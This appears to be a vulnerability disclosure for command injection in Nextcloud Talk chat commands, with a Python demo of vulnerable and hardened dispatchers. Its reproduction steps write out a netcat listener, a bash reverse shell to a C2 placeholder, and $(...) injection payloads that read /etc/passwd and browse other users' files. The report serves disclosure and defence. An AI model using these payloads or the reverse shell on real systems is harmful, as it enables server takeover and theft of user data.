The Nextcloud Talk app allows system administrators to set up chat commands that can be executed in Talk using the "/command" syntax. Users can provide additional arguments to the commands, such as "/calc 1+1" or "/wiki Hello", which are passed to the underlying script using @exec. If arguments are accepted, it is possible to trigger arbitrary code by wrapping it in bash command-substitution syntax, e.g. /wiki test $(mycommand). This gives arbitrary code execution on the server, which an attacker can use to spawn a reverse shell back from the remote machine.
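To make the mechanism concrete, here is an added illustration in Python (not Nextcloud's or Talk's own code) of a dispatcher that builds the command line the way the report describes, next to two hardened variants: one that passes the user text as its own argv entry and never involves a shell, and one that quotes it when a shell cannot be avoided. The dispatch function names, the use of echo as a stand-in for a sample command script, and the marker input are all assumptions of this example.

```python
import shlex
import subprocess

# Constructed stand-in for a Talk sample script such as /calc: it echoes its
# arguments, so whatever the shell did to them is visible in the output.
# (Assumption of this example; the real samples are scripts shipped by Talk.)
SCRIPT = "echo"

# Constructed user input in the shape the report uses ("/wiki test $(id)").
# "echo INJECTED" stands in for the attacker's command.
USER_ARGS = "test $(echo INJECTED)"


def vulnerable_dispatch(script: str, user_args: str) -> str:
    """Mirror the flaw described in the report: the user text is concatenated
    onto the command line and the whole string is handed to /bin/sh, so
    $(...), backticks, ;, | and friends inside it are interpreted."""
    cmdline = f"{script} {user_args}"
    result = subprocess.run(cmdline, shell=True, capture_output=True, text=True)
    return result.stdout.strip()


def hardened_dispatch(script: str, user_args: str) -> str:
    """Never hand the user text to a shell: pass it as a separate argv entry.
    The script receives the literal characters and no substitution happens."""
    result = subprocess.run([script, user_args], capture_output=True, text=True)
    return result.stdout.strip()


def quoted_dispatch(script: str, user_args: str) -> str:
    """If a shell is unavoidable (the script must be run through sh -c),
    quote the user text first. shlex.quote plays the role escapeshellarg()
    plays in PHP: the shell sees one single-quoted word."""
    cmdline = f"{script} {shlex.quote(user_args)}"
    result = subprocess.run(cmdline, shell=True, capture_output=True, text=True)
    return result.stdout.strip()


def injection_succeeded(output: str) -> bool:
    """True when the marker command actually ran, i.e. the literal $(...)
    text was replaced by that command's output."""
    return "INJECTED" in output and "$(" not in output


if __name__ == "__main__":
    for name, fn in (("vulnerable", vulnerable_dispatch),
                     ("hardened", hardened_dispatch),
                     ("quoted", quoted_dispatch)):
        out = fn(SCRIPT, USER_ARGS)
        print(f"{name:10s} -> {out!r}  injected={injection_succeeded(out)}")
```

Run on a Linux host with /bin/sh: the vulnerable dispatcher prints "test INJECTED", while both hardened variants print the literal "test $(echo INJECTED)". Note that a blocklist for "$(" would not be a fix, since backticks, ";" and "|" reach the shell just the same; the argv form is the robust one.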
This bug has been filed with a severity of Critical, in line with the bounty impact/definition chart and the Nextcloud Threat Model, as it allows both remote code execution by a non-admin user and access to the complete user data of any other user.
All versions that support Talk commands appear to be affected, as the bug is in the @execute command.
The following versions were tested:
snap install nextcloud --edge, occ status versionstring: 19.0.0 beta 2
snap install nextcloud, occ status versionstring: 17.0.5
Install and Set Up Nextcloud
snap install nextcloud --edge
nextcloud.manual-install "admin" "password"
nextcloud.enable-https self-signed
nextcloud.occ config:system:set trusted_domains 1 --value=<domain/ip>
Create a non-admin user named alice (for example with nextcloud.occ user:add alice)
nextcloud.occ talk:command:add-samples
Set Up C2 VM
Start a netcat listener on the C2 host:
nc -l -p 8888
Create Shell Script > shell.sh
> This script can be anything that gets executed and returns a shell
> In this case, a simple reverse shell is initiated using bash interactive piping to /dev/tcp
> A php web shell, meterpreter binary or any other executable could be uploaded here
bash -i >& /dev/tcp/<c2-ip-here>/8888 0>&1 &
Log In As Alice and Upload File
With Alice, start a Talk Conversation
Test Exploitability:
> Note: all commands appear to be executed successfully; whether their output is shown depends on the implementation of the backing script. For example, /wiki cannot show the result of cat /etc/passwd because the multiline output breaks the wiki script, whereas the calculator sample can show the output because it has an echo command in the script.
/wiki test $(id)
/wiki test $(pwd)
/wiki test $(ls -al .)
/calc test $(cat /etc/passwd)
/calc test $(ls -al ../)
Execute Reverse Shell
/calc test $(ls ../) (to explore the directory structure and locate Alice's files)
/wiki test $(chmod +x /var/snap/nextcloud/common/nextcloud/data/alice/files/shell.sh)
/wiki test $(bash /var/snap/nextcloud/common/nextcloud/data/alice/files/shell.sh)
Observe C2 Listener for Connection
Run Commands via C2
id
pwd
cd /var/snap/nextcloud/common/nextcloud/data/admin/files
ls -al
occ status
See attached screenshots